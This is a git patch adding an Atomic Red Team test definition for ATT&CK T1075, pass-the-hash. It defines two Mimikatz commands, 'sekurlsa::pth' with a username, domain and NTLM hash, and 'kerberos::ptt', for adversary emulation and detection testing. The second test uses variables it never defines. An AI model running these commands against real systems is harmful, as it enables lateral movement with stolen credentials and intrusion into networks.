From 86dff30791cf453ef0fffec9b1647718dd85c7bc Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Fri, 25 May 2018 08:24:11 -0400
Subject: [PATCH] T1075

Action packed
---
 atomics/T1075/T1075.yaml | 43 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 43 insertions(+)
 create mode 100644 atomics/T1075/T1075.yaml

diff --git a/atomics/T1075/T1075.yaml b/atomics/T1075/T1075.yaml
new file mode 100644
index 00000000..638a168a
--- /dev/null
+++ b/atomics/T1075/T1075.yaml
@@ -0,0 +1,43 @@
+---
+attack_technique: T1075
+display_name: Pass the Hash
+
+atomic_tests:
+- name: Mimikatz Pass the Hash
+  description: |
+    Note: must dump hashes first
+    [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    user:
+      description: username
+      type: string
+      default: Administrator
+    domain:
+      description: domain
+      type: string
+      default: atomic.local
+    ntlm:
+      description: ntlm hash
+      type: string
+      default: cc36cf7a8514893efccd3324464tkg1a
+
+  executor:
+    name: command_prompt
+    command: |
+      mimikatz # sekurlsa::pth /user:${user} /domain:${domain} /ntlm:${ntlm}
+
+- name: Mimikatz Kerberos Ticket Attack
+  description: |
+    Similar to PTH, but attacking Kerberos
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: command_prompt
+    command: |
+      mimikatz # kerberos::ptt ${username}@${Domain}